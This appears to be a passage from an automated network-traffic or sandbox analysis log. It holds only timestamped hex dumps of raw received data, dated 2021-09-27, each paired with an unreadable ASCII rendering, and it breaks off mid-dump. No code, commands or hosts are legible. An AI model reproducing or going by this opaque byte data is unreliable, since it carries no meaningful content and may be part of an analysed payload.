                                      Data Ascii: RriD|^Ku$^}_iTyQaXn#F#(B72)dBM[NaFNeXLIOmNUU\~MBZSb$z1DvH.@gE@ldba[dK`}|CkHFpo-tYv?,paw>EB0K`=*0IJ:sS?O(_
                                      2021-09-27 11:24:29 UTC147INData Raw: d7 14 e9 de bb dc 34 ef 1f a8 be 57 78 12 a5 ce 9d d5 d6 a0 3e fb 60 b5 0b dd d6 a8 b8 88 21 6d 23 f3 d3 a6 a2 a3 5a b7 d0 66 15 ca e4 1a 96 bf e5 59 9d 6a 7a 73 67 46 65 fd 53 44 f4 c2 6a 55 5d 3c 85 14 bc 7f b5 82 fc 1e 57 5e 4b 42 90 e6 a9 e8 2e 31 38 1c 1c 35 eb 83 7d e3 c2 e1 8a 95 68 42 c7 dc b2 9e 82 4a 8b f9 bd 62 eb 92 47 1c 9f 8d e8 46 ec 1f e8 74 5e c7 0d a4 7a 19 44 3d 55 f2 7d c0 49 a9 6c 64 8f 94 1a 42 1b 0e 8d ee 29 5e d0 3b 0b 8f 05 58 24 55 c5 8f 74 c8 91 fa 3f bc 6b d0 f8 1d 6d f1 98 8c 92 55 99 ea 0b 1d dd 27 4c e1 ab 09 2d a8 5d 51 3a f4 9e 37 04 58 3e e4 1a 28 7b 60 81 19 0a b0 68 d4 05 a0 1f e9 bd 7a 8c df a9 33 ca 16 42 05 99 8b 85 be c1 2a a2 f4 d4 39 00 ad 33 18 7c eb 3b 1d 7d e9 29 aa 19 9d 8a 05 02 27 a2 39 45 c9 0e 38 0c 29 24
                                      Data Ascii: 4Wx>`!m#ZfYjzsgFeSDjU]<W^KB.185}hBJbGFt^zD=U}IldB)^;X$Ut?kmU'L-]Q:7X>({`hz3B*93|;})'9E8)$
                                      2021-09-27 11:24:29 UTC148INData Raw: 82 86 c9 4c 9d eb 7f 39 94 bf 9b c4 98 aa 81 4e 1d 12 74 23 fd 10 1a 71 cd cb dd 3d 32 56 b3 8a df f3 17 59 aa f6 8a 8c 2c f1 96 9e 77 0d 88 d0 2d 32 a2 87 8c db d0 44 01 bc 92 0c 53 7a 28 50 67 f4 77 18 00 20 66 ec d4 7d 1b 45 27 57 cb c4 c2 ae 95 a5 59 5d 3a 35 74 1f e6 7e 95 06 16 1e be 0a 7c b5 64 db 65 35 60 de 25 01 81 fe 1b d2 46 de 95 d5 d6 f1 30 75 f4 1c 14 56 b3 78 dc 54 5e 61 66 7b ce fa a3 34 c3 88 e1 ff 3e 32 bf d1 de 19 32 b8 14 dc a2 e8 5a 40 af d7 77 9e 23 06 12 06 7b 93 c5 2e 85 07 8a 7f 4e bd 90 da d2 43 5d ba 6c 04 77 83 ba 4b 6f 65 af 4b 9a 0e 98 8b e2 d9 74 fa 81 48 7c 9a 06 0b 64 c4 58 88 ed d4 d4 9a d4 71 33 83 30 8a 87 60 b8 a3 8d 01 26 e6 26 d3 9b 25 b6 79 dd de 88 eb 6c bd 94 a4 2c f9 99 f4 bf 35 8b bd 19 dd 01 95 1d 2a b3 90 d8
                                      Data Ascii: L9Nt#q=2VY,w-2DSz(Pgw f}E'WY]:5t~|de5`%F0uVxT^af{4>22Z@w#{.NC]lwKoeKtH|dXq30`&&%yl,5*
                                      2021-09-27 11:24:29 UTC150INData Raw: 83 18 7a e5 c3 8a dc ad 13 2a 49 6f 05 03 b0 80 82 e5 0a 64 dc 56 47 b9 e0 1b 1c 5c fd 10 30 7f 73 0a ad 8a c5 33 0c 01 23 82 d8 22 e4 0e a2 35 2c 18 a8 87 83 d3 87 8e 01 64 67 b9 0f 63 19 c3 12 b8 96 00 15 c1 0f b3 94 d3 97 06 20 66 6d ea cb 0c 69 36 4f bd 0c 73 e7 77 88 a5 b6 ff 72 60 42 ff 18 6f 67 7b 3c 06 f2 ce 76 80 04 78 c1 c1 7d c5 a0 2b b4 62 ff 7f 50 53 d7 ba 4b 7f d8 6a a3 00 c4 b2 46 bf 27 32 2e 88 13 8f 15 09 f0 60 af 34 d7 28 db 63 40 ce 93 c5 67 6c ac 84 02 64 cf ad a8 3b cf c4 ca 6f ff 1f 72 39 69 ce 5c 81 4d 35 8c f9 28 23 d2 42 ab 4b 13 e1 53 fe 6c e4 e7 4c 55 e6 57 b6 50 ea 36 89 d3 70 04 44 00 9f 2b 14 96 a2 f2 3a d2 55 4f ac 7a 2a b2 a9 37 d5 8e d7 6b 59 cb 4e 67 eb 45 46 e6 4d bd 21 80 d2 d3 fb 60 5b c6 de 05 ce ec 6d ce ec 8a 50 aa
                                      Data Ascii: z*IodVG\0s3#"5,dgc fmi6Oswr`Bog{<vx}+bPSKjF'2.`4(c@gld;or9i\M5(#BKSlLUWP6pD+:UOz*7kYNgEFM!`[mP
                                      2021-09-27 11:24:29 UTC151INData Raw: 17 e9 da f4 ae dc 27 7b 98 3b 81 ce 98 cb 27 9c 69 51 df c0 a7 8d 15 1d 84 3e 17 74 5f 04 5d 5c 71 8f a2 41 37 7b e1 4e 4a fd 02 dc 0c dd 63 15 c9 4a ac 3c eb c5 1f 6d 93 19 ba 36 96 fd ce d4 e6 91 73 94 26 ab 30 f1 1a 06 af 0b c8 6d 27 75 53 77 0d 15 5a 9c c4 c1 2c 8e 8a ff 60 66 af 6b 78 ba 2d 3b 7b d8 06 2f 4b c2 9f 2e d8 22 6a 4d 22 88 c3 e0 2a 93 67 82 12 1a 2e 93 c5 b3 61 50 0b 06 2d 38 69 fa d3 b8 7b 6c 0d 68 4e 1f 79 11 e5 ce f6 f3 59 95 0c e0 3a a9 b2 22 08 1e 68 ef 69 f9 7a c1 da 12 16 a7 00 1e 19 fd 0c c3 a6 7a ed 4b 42 53 4a 8f 6e 0d 8c bd 8b ef c7 02 3d 9a b8 fc c1 e0 6c c8 a5 51 71 1a ee 2c 49 d0 49 85 35 df c6 b3 29 2f 82 59 01 76 2d 62 03 74 c4 71 82 66 b3 44 4d 86 95 20 73 8c 6c 08 e9 76 64 ff 98 0d 8c 11 c6 2f 6d cf 87 7a 46 86 ed 11 be
                                      Data Ascii: '{;'iQ>t_]\qA7{NJcJ<m6s&0m'uSwZ,`fkx-;{/K."jM"*g.aP-8i{lhNyY:"hizzKBSJn=lQq,II5)/Yv-btqfDM slvd/mzF
                                      2021-09-27 11:24:29 UTC152INData Raw: ab e4 57 b5 83 0c 7f 19 df 42 c4 c5 45 94 ca 79 3d f8 22 c8 72 3e 9d 17 8b 9b 36 9e 91 35 0c 5e a8 7a 13 17 14 82 ae 2e 1f d3 12 01 ab 31 1e 46 8e 5f 92 3f 94 99 bd 60 9d 58 87 66 6a c5 1e 0f 30 88 ab 3d 94 fe d3 36 14 7b 93 28 b2 5d 79 51 ed 56 90 e9 54 d2 16 5a 4e eb ed af 1f 12 0b 19 8b 54 28 ea b3 25 0b 1f 77 0d 05 34 fe 28 c7 5a 8a 45 bc de 6b 40 78 73 01 91 f9 3c 5f 19 f4 f7 5d b1 d0 e3 a7 32 8d eb cb 28 2b 8e c4 4e 5d 75 b3 42 8b 8a 1f 6a 0b c2 50 4f a8 11 3c 36 91 4f 96 66 5a 02 ef 3a 28 7a 22 52 1c 88 a4 a0 c8 9c 1b 5d b1 52 10 53 05 74 1a bd 28 bb 4a f0 34 69 8e 99 de 78 60 6c 4b 13 0a 87 e4 72 cd 46 c2 82 bf 0b cb b6 65 e5 10 69 a3 ad 64 c2 ca 31 1a 22 27 95 34 d9 18 ed c6 0c aa 1f 4c ba bc 8d 5f 17 dc 69 92 1b f6 c1 21 dd e3 3a 0b 4c 36 2a a6
                                      Data Ascii: WBEy="r>65^z.1F_?`Xfj0=6{(]yQVTZNT(%w4(ZEk@xs<_]2(+N]uBjPO<6OfZ:(z"R]RSt(J4ix`lKrFeid1"'4L_i!:L6*
                                      2021-09-27 11:24:29 UTC153INData Raw: 3d fe 66 d8 3c 5d 17 98 f8 56 c3 ff 98 e2 e8 f3 93 35 92 33 ed 02 e3 fc 27 6d e5 c7 31 cd b6 09 fd f8 51 69 a3 37 f7 38 85 e7 02 7c dc f6 11 63 fd 1c dd 75 71 88 af 1e 6c 45 5a c8 2c a5 bf 5b 10 af fe 01 d0 81 e5 72 6b d0 b1 5b 48 bb 18 f9 88 55 95 bb a9 c1 2a ad aa 63 fe 60 b7 16 9b 8b 33 13 6d 3e 19 a5 e8 f7 4a 10 50 c4 d2 d2 87 5a 7c fa 92 77 68 b2 01 6a 2f a0 4f 66 36 a5 33 ef ed 80 40 47 51 70 d3 a3 39 ab 67 c7 57 64 55 ce e6 ff 9b 6c 99 fd 13 06 c0 57 1a 71 b2 60 5b d5 44 6f c7 43 d1 fd 84 ed 3c 59 77 6b c7 d4 3f 5c 0c 5a b8 23 5e 75 05 07 b6 ac b6 1a 26 7d ec 15 fe 62 5f 2c 22 c0 dd 44 b8 26 66 70 fe 65 da 91 00 b6 7f c8 17 42 55 71 f2 e5 74 e4 57 8e 32 fb 84 72 41 63 78 66 f0 6b 24 88 91 6b ce b5 bf 77 80 52 da f9 65 77 05 a0 9f f9 23 56 84 19 71
                                      Data Ascii: =f<]V53'm1Qi78|cuqlEZ,[rk[HU*c`3m>JPZ|whj/Of63@GQp9gWdUlWq`[DoC<Ywk?\Z#^u&}b_,"D&fpeBUqtW2rAcxfk$kwRew#Vq
                                      2021-09-27 11:24:29 UTC155INData Raw: 9c 74 3b 4b 8f 22 04 dc 4b bd 94 1b 1f d7 70 1f d5 94 de 81 35 a6 24 b7 45 24 e8 46 f8 82 21 5d 2c 9f a9 32 9f 7e b3 19 55 92 1c 50 c4 e8 b0 9d ac 3e f7 1b 2b f2 5d 6a 78 8f ca 6c d2 75 20 b2 ad 64 ad 9a 9f 1c 61 28 80 6a 48 b7 7d c9 9c 65 fa c5 f4 b0 bb 4c 4f d1 95 43 2a 81 31 69 91 d1 ad cc a3 04 45 d0 78 d8 fe b9 d6 5b d3 55 7d 96 b9 fa c3 5e 4d 27 99 a2 d8 a7 f9 8a d0 e5 3c 64 9c db 95 1e ba c8 10 83 3e b4 16 fc eb 33 8f 74 be 6b 52 bc d2 0d ec 2e 98 23 3a 29 1c 5c 2b b4 64 d0 1a fd 0c fb e9 43 dd 3e 8d df 85 a4 d5 ba d0 89 1f 42 5a a4 77 06 02 f8 a3 78 9d f6 48 d2 da 81 02 cd f0 9f 10 7e c0 34 de eb a4 97 79 56 fa 27 f4 3d eb 44 7b 52 ef e7 e8 0d 12 65 65 42 12 1b 90 b2 d8 34 4e 25 62 3b 6d 41 36 dd e5 d1 8f 43 c2 40 9b a8 47 4a d0 ef 86 87 06 8c 09
                                      Data Ascii: t;K"Kp5$E$F!],2~UP>+]jxlu da(jH}eLOC*1iEx[U}^M'<d>3tkR.#:)\+dC>BZwxH~4yV'=D{ReeB4N%b;mA6C@GJ
                                      2021-09-27 11:24:29 UTC156INData Raw: fe 55 2b b4 08 f7 69 fb df f1 d9 55 5e e0 57 f6 4c d0 19 68 99 8e 97 89 95 0a 8e 23 ac b4 5f fe b8 ae 67 b6 71 e8 de 50 2e 6c d8 fb 90 57 22 cb 6e 1b 3b 85 75 66 70 54 ac 69 29 45 14 9a 1c de 0b 45 39 9a 7c 61 9b 35 c2 75 07 f2 42 c7 fe 89 66 57 18 fb 6f a6 4e 9c 50 79 89 27 55 0c 45 f3 7e 65 f7 ed 95 75 b9 22 27 d3 23 70 cf da 6f 8e 75 d9 89 1a a8 3f 20 84 5e 44 e0 d9 bf 17 9b eb f0 e2 6a 55 ce da 3a f0 f8 62 da e7 bb 6c bb 37 c4 25 35 4d 9e 6d f5 2a bf d0 60 8a e3 c5 2f 02 99 72 7b 6e 8b 9b c9 2b 94 22 e2 d5 c4 45 ec 31 51 a5 60 a6 ed ab 7d 5f eb 6f 44 40 04 a8 75 2f af f5 5c 61 70 3c 7f 43 71 8a 70 90 01 ce 11 fb c7 65 36 36 2e 4c ff 8a 52 49 33 d5 c8 8a 73 2b 1c 45 d8 15 7d 61 b8 ca 7e 2d da e6 90 02 f0 29 26 bd c2 ba 75 fe b5 1b 86 fb fb 06 84 65 8f
                                      Data Ascii: U+iU^WLh#_gqP.lW"n;ufpTi)EE9|a5uBfWoNPy'UE~eu"'#pou? ^DjU:bl7%5Mm*`/r{n+"E1Q`}_oD@u/\ap<Cqpe66.LRI3s+E}a~-)&ue
                                      2021-09-27 11:24:29 UTC157INData Raw: 0a 81 d9 f7 28 ad 45 83 3e 27 3f 8c fd aa 6e 64 52 16 3f 6c 5f d9 e8 9c 49 5e 35 15 3e 76 40 3e 32 05 29 3e 83 1f 95 43 0d b4 b3 06 1c 01 72 c1 55 d5 26 ee f2 2c 32 94 2e 0a 13 e0 18 f9 98 7e c2 64 40 77 69 ab 41 2e 82 a7 b5 ee e7 29 32 ad bc e8 d8 ed 7a e6 b7 52 35 32 e6 24 78 cd 56 c2 17 d7 82 d6 43 1e b6 10 1a 68 0a 52 14 6b da 25 81 78 ac 58 45 cf d3 20 74 85 6e 1c f4 31 5b f6 f2 0c a6 21 e9 73 72 cd bb 54 59 bf d1 19 b6 73 c7 d1 19 69 d3 ba 95 aa 75 94 59 56 8e f8 16 6f 1d da d1 f7 28 10 b5 d6 78 68 d2 68 8a fc 32 a1 90 9b bd 4a ce de 56 a7 0d c6 28 b8 f2 07 32 4a 23 43 e9 dc f3 bd b7 b2 5f 4e 5d 10 e9 97 2d 21 cc c9 0d bc ba cc 1a eb d0 9a 1c cc 49 7c 18 f4 9a d7 f7 18 73 da 53 86 32 95 91 a7 29 12 3e 72 9a 66 05 a2 a5 6d a0 f2 9a 46 87 a1 1a af 80
                                      Data Ascii: (E>'?ndR?l_I^5>v@>2)>CrU&,2.~d@wiA.)2zR52$xVChRk%xXE tn1[!srTYsiuYVo(xhh2JV(2J#C_N]-!I|sS2)>rfmF
                                      2021-09-27 11:24:29 UTC159INData Raw: ac 43 a5 82 2a 44 43 5e e4 4e 27 fd e3 bc 6d 4c 14 fb 93 87 d1 79 ba cb f2 05 75 93 a8 7d 48 78 b8 06 c2 99 4e 20 43 f9 40 37 90 69 12 10 b2 06 95 60 49 0b 96 1b 13 7d 3c 4b 12 91 ac ae e8 e3 56 57 bb 5f 4d 13 05 62 73 9d 5e b9 14 9f 14 58 82 8a cd 2a 20 53 4b 39 1e 9b fc 0e e8 48 d2 81 fe 46 af 97 52 b0 24 2e 8b 8e 63 d8 d4 64 48 56 6c d9 17 8e 11 eb 81 53 e0 02 39 9c f6 df 0d 1f ba 0e f6 42 90 f5 66 89 0e 93 a1 ec ee d2 48 9e 7d 1e c4 31 05 18 ea b7 68 f2 2c 19 9c dc 63 9d dd a8 69 6e 0b c3 3a 7a e1 58 c7 9e 6b 31 22 02 33 4b f4 bf 5d 13 e2 91 3b 91 c0 65 05 3b 7c 11 aa ad 5c c0 73 56 13 31 b3 a4 4e af 4d 48 5a b2 58 a7 78 a0 43 23 44 02 28 01 33 36 6a 3d 79 30 ab ab fa b1 5c 35 db b4 11 7e b8 6a ad 11 cf ee 66 0d a1 38 8b 3d ef f6 f8 9d f0 ee 7b 80 30
                                      Data Ascii: C*DC^N'mLyu}HxN C@7i`I}<KVW_Mbs^X* SK9HFR$.cdHVlS9BfH}1h,cin:zXk1"3K];e;|\sV1NMHZXxC#D(36j=y0\5~jf8={0
                                      2021-09-27 11:24:29 UTC160INData Raw: 78 e0 9f 20 33 b1 07 07 12 a0 4a 79 2c ba 44 de f4 91 78 65 6d 45 e0 db 3d a7 62 81 0f 42 00 9f df af d0 5b df b5 3d 4b 9c 79 4b 3f 93 34 03 e7 05 2f cb 03 92 d0 fa 94 20 5b 7c 65 f8 db 73 6d 0f 52 a0 0b 68 78 20 22 9f 94 de 66 68 57 e9 01 da 5a 71 01 1a ea e9 4a a7 1b 5c 72 dd 54 ed 95 0b a3 5a c5 4f 68 42 69 e4 dd 7e e8 4b a7 28 fd 6a 89 fe f7 f4 fd 61 ce 47 c6 da 26 89 c2 d9 3b fc 0b 97 a3 33 4b 0d fc b0 f6 3d 44 bf 17 7c 59 9d 0a 2d 2d 1a 32 db 9f e6 fa 3f b6 73 be e1 d2 61 9c 8a 66 da 32 ca a2 43 e8 75 41 44 bd 8d 90 27 ad 7d 8b 24 91 90 68 cb 9b e3 ac 11 fd c0 43 58 58 83 45 c5 ca 11 db 9c 2c 37 e0 6c 8c 29 66 f0 6c eb fd 43 ec ee 26 1f 0b be 3c 4a 4d 1c e7 e6 78 48 9c 04 13 f9 58 4a 22 98 01 ff 18 bc b4 21 d4 28 eb 39 94 ce 5f ae f7 c8 6c 65 f2 21
                                      Data Ascii: x 3Jy,DxemE=bB[=KyK?4/ [|esmRhx "fhWZqJ\rTZOhBi~K(jaG&;3K=D|Y--2?saf2CuAD'}$hCXXE,7l)flC&<JMxHXJ"!(9_le!
                                      2021-09-27 11:24:29 UTC161INData Raw: 81 e2 ab 14 1a 6b c4 f9 86 f0 a2 88 b2 8e 30 17 e8 86 dc 53 a7 a2 56 af 19 8b 36 aa cd 46 87 13 ae 3d 16 84 f7 47 c0 31 d2 76 12 10 6b 19 79 9f 6c c8 1b e3 18 fd eb 41 fc 52 b8 e7 a5 8e b8 d4 e9 a7 02 14 0f 9c 3f 29 5e f2 c8 1c e4 ee 2f bc ba 9d 34 86 f8 80 76 75 72 f6 59 1f 3e 6c f5 a9 92 36 a2 13 ce 7c 59 79 d7 8b e1 2e 21 5e 38 3d 21 38 b3 93 e0 2d 39 50 5b 7a 39 03 70 81 a1 8a e5 03 94 14 b4 d1 43 59 9b ab a3 9e 1d c2 40 8f 44 4f 8b b5 39 bc be ba 3e d8 37 64 ad 75 98 a8 89 9d 19 b0 ea 77 76 56 0c 30 f1 cf 43 54 57 7f 13 88 4d 10 ff 8a be 50 b9 eb 4f cf 42 be 10 2c 3f a8 bc 19 d9 bf 84 ea aa fe 9e 35 c5 28 ba 1e a6 ab 6d 26 fa 8a 7d 94 0e f7 6a 16 a7 99 0b c6 45 86 4d 36 90 ef 1c 7e da a0 6b d1 3a a2 b6 53 2d 85 eb cf c5 17 f4 2e 10 fd b0 03 25 a6 7d
                                      Data Ascii: k0SV6F=G1vkylAR?)^/4vurY>l6|Yy.!^8=!8-9P[z9pCY@DO9>7duwvV0CTWMPOB,?5(m&}jEM6~k:S-.%}
                                      2021-09-27 11:24:29 UTC162INData Raw: 0f 44 cf 1a ea 9d 4d ed bd f2 24 14 cc 73 a3 9b 32 1f cc 16 59 27 c4 d7 a6 6e 9d c8 2b ba 52 12 f8 92 ae 80 ab cf 2e 2d cf 8d 78 19 bf 15 6b ba ab a2 85 fe 1b 4d cb 72 8d ad e7 c6 3a 8c 01 22 ca c1 d1 9b 53 18 72 c0 e2 9d fb b8 8e ad a4 0c 22 b2 f0 bf 4a 9d 95 34 73 82 93 37 8f b3 09 d9 5e 68 30 17 a5 cd 56 c1 57 99 00 6c 65 56 6e 04 86 7b c9 42 87 b9 e1 f1 4b c1 39 94 ec d8 f5 df bc d8 81 62 63 9f a9 16 e1 5c fa d5 37 ad 98 52 c0 ad ee 1f ac 9e ed 7a 10 a5 54 b2 af 7b 25 21 48 6c b5 0b fd d1 8e 8b 88 28 a0 0b df d1 a6 a4 80 dd c9 49 33 15 ce c4 38 95 bf e5 80 bd 47 68 29 47 fd 67 fb 53 64 f2 1f 68 55 42 a4 ad 39 be 46 b3 a8 7a 79 ce 5f 4b 47 b0 5a ab ea 2e ab 1d 3a 0f 13 cb 31 7f e3 c2 81 9f bd 68 3b d8 ca 9a ba 80 4a 8d da 3b 1c 72 bd 47 18 bf 1a ea 46
                                      Data Ascii: DM$s2Y'n+R.-xkMr:"Sr"J4s7^h0VWleVn{BK9bc\7RzT{%!Hl(I38Gh)GgSdhUB9Fzy_KGZ.:1h;J;rGF
                                      2021-09-27 11:24:29 UTC163INData Raw: 63 cf ac 9a 90 d6 cf c8 0e c7 32 60 b0 4b c5 7a 81 4d 07 6d 39 3d d5 e5 61 83 fa 0c 17 7d c6 ea 36 63 bb 7d f0 77 9d 72 1c 1e 01 f6 49 06 94 08 98 28 05 b8 f5 e7 1e d2 d8 5c f9 55 15 b0 31 18 09 20 b7 f2 9c cd 68 74 fb 46 50 e9 f5 ab 0a 92 ec d3 aa 7e 5d c6 60 2b 47 f6 6b d1 f6 be da b2 22 c5 51 79 58 b6 68 ac 8c d8 31 38 eb a0 28 07 8a ab 52 58 43 9d 88 f4 1c af 53 c1 b5 ec 69 c0 ad 63 13 7f 8c d5 15 70 6f 32 81 83 81 ec 6c f9 c6 7f 99 ac 91 80 e3 9a f5 88 34 bd 4e ed 57 d3 94 23 b2 cf 55 f2 27 0e 59 a1 0c f5 92 0c 7b aa 85 d4 27 35 fb 89 df 43 57 8d da 2b 8b 3a 8e 12 d0 d0 3e 30 29 97 0a 53 65 24 da 6c d4 57 21 18 87 7c ca 40 9d 14 1f 3b 79 e6 01 e0 9e 8f 21 27 c2 3e 17 43 39 05 5b b7 24 bf 3d 93 3a 72 32 9d df 65 8d 4d 17 13 07 81 e6 17 75 77 d8 93 4f
                                      Data Ascii: c2`KzMm9=a}6c}wrI(\U1 htFP~]`+Gk"QyXh18(RXCSicpo2l4NW#U'Y{'5CW+:>0)Se$lW!|@;y!'>C9[$=:r2eMuwO
                                      2021-09-27 11:24:29 UTC164INData Raw: af 38 be 7f 08 b1 7a 60 cf 5d a5 46 0b 5b a9 e9 2e ab 04 35 0e 13 ca 3d 8d e3 79 c0 9d bc 68 42 2e d0 9a b3 81 48 7b d3 80 1d 70 92 47 18 fc 34 ea 46 ed 87 37 59 f7 e0 2f 19 78 19 8d 02 7e da 60 c0 5c a6 ff 48 8f 95 1c 68 eb 71 14 ef 28 58 e6 84 d5 8e 07 c2 01 78 23 af 54 76 8e fa 26 9d 8e f9 fa 1d 76 d9 c2 8a 92 53 ae 6c 53 85 02 26 4d c1 14 0b de 88 c7 74 0a e6 91 16 5c 5b 3b e4 2a 16 f2 64 81 06 19 98 6c d7 e8 a7 37 6b c3 e3 a7 fe ad 13 17 14 74 04 ec af aa af e7 0a a9 f2 d4 39 3d e1 23 19 8a f4 11 31 7f e9 5d 81 9b e3 12 06 3a 22 7a f9 45 c9 0e a2 7d 25 35 aa 9a 85 c6 00 08 99 67 67 bd 2f 9f 1e c3 12 3f b3 6e 06 e5 2d b8 97 d3 97 52 6e 4b 6d f7 d4 75 40 13 4f bf 0a 49 61 2f 14 a4 b6 e6 52 26 40 f2 1a f7 42 56 2e 8f f9 c4 75 9d 04 15 5d f6 7f c7 be 30
                                      Data Ascii: 8z`]F[.5=yhB.H{pG4F7Y/x~`\Hhq(Xx#Tv&vSlS&Mt\[;*dl7kt9=#1]:"zE}%5gg/?n-RnKmu@OIa/R&@BV.u]0
                                      2021-09-27 11:24:29 UTC166INData Raw: 17 e4 04 26 1b ca 53 54 4d c5 4d 7e a2 d8 94 28 48 21 63 da 3d 33 0d 39 16 7e c3 86 fe 3a db 05 0c 15 70 df 2d 2b 16 c8 91 00 c9 fe 65 7f 69 d9 db e1 06 0f 78 75 bc 06 32 b4 cc 7e cf cc 2d cc 06 5c a3 00 f7 b4 34 ae 32 ca 68 b2 3f db bb 2a 66 38 3f f1 6d 88 95 c1 7e d2 1a 65 77 86 d6 9b 13 a0 82 88 e6 e0 c5 61 18 1d cb f8 9f 5d 45 94 3c 00 64 87 c6 4d 63 fd c8 55 c8 ae 89 8f 84 c7 b8 5f 33 5b 3c a4 f1 09 16 c5 33 3b c7 d4 a6 84 ee 5b 1f 81 c7 8a bd e4 c7 3a fe 00 b2 db c0 d1 e9 24 3a 42 f1 cc 59 cd 9d a1 95 a4 7e 23 a1 eb b9 2c e0 93 27 dd 57 13 45 ad f8 16 8f d2 1b 36 22 8e ae d6 5e 75 ff 6b 48 8c 15 0e 42 99 2d 49 93 c6 35 fe a7 db 05 3e a1 d0 c9 20 d5 fa ed 9e 64 35 5b af 05 0f 26 7a a7 15 a1 eb 6b 22 5a e8 51 b3 c8 6d e5 13 eb 4b ee 78 e9 81 50 5e 34
                                      Data Ascii: &STMM~(H!c=39~:p-+eixu2~-\42h?*f8?m~ewa]E<dMcU_3[<3;[:$:BY~#,'WE6"^ukHB-I5> d5[&zk"ZQmKxP^4
                                      2021-09-27 11:24:29 UTC167INData Raw: b5 2d 98 e6 1d b8 91 d3 ba 21 79 49 6b ea 05 3f 73 19 4b bd 78 58 1f 16 17 a4 c4 fa 6b 68 47 ff ef f3 7b 54 28 20 16 c3 47 82 02 58 2e ed ed d8 b9 30 ee 4e cf 7d 50 79 a6 c2 e0 7c de 6e 1c 0a f5 b0 40 25 2f 18 0e ac 35 84 64 08 8e 5f 11 19 a5 29 fd 48 6e e3 66 c3 58 44 2c fa 4a 64 fd ab 8e 37 be c5 f9 d9 dc 32 12 1e 5c ee 59 91 3f 14 7d d6 2e 23 bf 72 90 64 17 e1 27 d5 f9 98 78 4d a2 e4 64 b9 55 ea 44 12 c4 5f 10 62 bf 93 3b 16 90 82 17 12 e0 57 56 8e 7f 00 a3 ab 37 ff 97 a8 c0 5a cd 4a 96 e4 55 44 e0 d7 b5 0b a0 f6 f5 f5 a7 5c d5 fc 37 e0 af 6f c2 f5 a4 7d da 25 d6 7a 6d 48 62 67 bf 70 de 96 50 ec b3 82 0a 2d 46 52 4b 59 b8 98 73 1b bc 3f d9 ff 9a 62 d0 1a 51 84 2b 86 e5 9b 6b 6f 40 83 93 84 c8 6c 8b c1 6f 3b 8a b3 44 ef 8a a8 86 64 04 6d fd 20 fc 14 17
                                      Data Ascii: -!yIk?sKxXkhG{T( GX.0N}Py|n@%/5d_)HnfXD,Jd72\Y?}.#rd'xMdUD_b;WV7ZJUD\7o}%zmHbgpP-FRKYs?bQ+ko@lo;Ddm
                                      2021-09-27 11:24:29 UTC168INData Raw: 86 7b c9 42 d6 00 32 e7 dd c1 28 94 53 fd a0 96 f8 d8 90 62 62 25 c0 1f 1c 70 de b6 14 ef f4 3d b3 ad fe 08 c5 97 fc 7a ce c6 54 b8 f8 c4 97 1e 33 63 33 02 ec 2b 07 d3 88 3e 64 0b cf d1 d4 a5 d0 df d8 49 43 79 ce c4 a1 94 a9 e5 b1 b9 aa 61 44 47 7d 16 fd 53 64 f2 fc 6a 27 43 65 a7 2b be 0b c7 a8 7a 60 ce 49 4b 34 b1 f2 a1 fc 2e d7 68 31 0e 13 cb 29 7f 91 c3 28 95 a8 68 0e ae ca 9a b3 80 5c 8d fe 3c 0c 79 84 47 34 c8 30 ea 46 ec 93 cd ae 4a 3e 25 0e 78 69 33 1d 7e da 7d d6 56 38 45 06 86 83 1c 78 e0 70 14 ef 29 4c f0 f7 08 d1 0e d5 01 f0 ad a9 54 76 93 ec 3f 6b 54 30 f3 0a 76 cd cb 8e 92 53 b3 7a 75 1b dd d3 43 d6 14 bb 53 a8 c7 74 17 f0 b8 c6 ba 45 32 f3 3a 16 53 60 81 86 04 8e 65 a4 04 80 39 7c c3 e3 8d df ad 93 0a 05 62 77 02 9f a4 b8 e7 3a e1 f6 d4 39
                                      Data Ascii: {B2(Sbb%p=zT3c3+>dICyaDG}Sdj'Ce+z`IK4.h1)(h\<yG40FJ>%xi3~}V8Exp)LTv?kT0vSzuCStE2:S`e9|bw:9
                                      2021-09-27 11:24:29 UTC169INData Raw: 2e b1 12 5b 39 b5 23 e3 3f af 3d df ef e8 60 c0 1e 4f 98 7c 76 d5 bc 6d 6f 32 82 80 85 c9 2a fa 9d 74 fb 84 96 b3 e9 9a aa 87 67 9b 2a ee 71 f6 db 35 b5 cf cb dd a7 17 78 a1 ea fc 70 1e 25 a5 f3 fa f0 b6 f1 89 ba 5f 31 92 f2 0e 9e 20 dc 15 6e f2 40 21 5e 90 0a 4b fc 28 6e 76 f7 57 8e 98 20 66 cc 40 45 1b 37 3e 99 e9 e3 c2 9c 24 27 27 c4 3b 24 70 c8 03 fa 95 23 8c e7 0d 1b 5a 95 87 c8 65 aa 41 ae 01 24 81 d0 ac ff 44 de 93 ee 50 a2 ae f2 f4 3d 34 ea 10 78 dc ce 7b 5d 74 2f ef 43 b1 11 c3 3c dd d4 3e 32 a0 cb f6 46 31 33 02 d3 20 ca 60 41 af d3 57 6a 21 f1 14 17 4e 9b d4 bc 87 e2 88 7f 4e 9b 21 ed f7 50 43 b7 41 c6 d3 85 90 cd 11 ef ae 39 9f ce 6e ac e2 31 48 df ac 5a 5a ac e0 7b 65 d4 73 1f c6 c4 7c 85 fe 59 1e 97 30 fe ac d0 d7 1c 8c 1d 8b c6 c1 d1 9b 33
                                      Data Ascii: .[9#?=`O|vmo2*tg*q5xp%_1 n@!^K(nvW f@E7>$'';$p#ZeA$DP=4x{]t/C<>2F13 `AWj!NN!PCA9n1HZZ{es|Y03
                                      2021-09-27 11:24:29 UTC171INData Raw: 5b c1 dd 09 e0 b2 ed 74 6f fc b9 17 bb 5a 2d e4 55 27 a3 71 ab 06 84 84 44 d6 05 a6 26 6b af f7 56 dd 87 13 4a 09 43 05 03 ae bb af 95 0b 12 fe fe 39 dc fc 1a 18 7c f5 00 30 68 ef df 91 b1 e3 2f 27 03 23 82 f8 54 c9 23 a5 9f 00 1f aa f3 a0 f8 01 f0 98 76 67 4e 2d 7a 11 e9 12 42 95 2c 07 e7 2f a9 97 a1 96 93 50 61 6d 32 f2 3f 41 1b 4d ae 0a 7c 53 ef 13 8e b6 bb 75 6b 41 ff 18 e6 42 87 2f fb c9 ee 75 40 23 59 5c ec 7d d6 bf 71 9a bf ec 55 56 81 78 c5 d2 7e d8 7d 83 79 c6 9f 5a 0f 02 a7 16 af 33 84 16 1a f0 91 16 f9 d5 02 c4 96 43 e2 91 c5 61 55 2a 3b af 95 de 83 88 43 e0 c5 ca f5 da 21 60 74 4f 32 4e ab 4d 2d 42 d5 28 23 cd 60 83 8d 25 11 44 fe ea 76 4f 4c 55 e2 77 a8 53 98 37 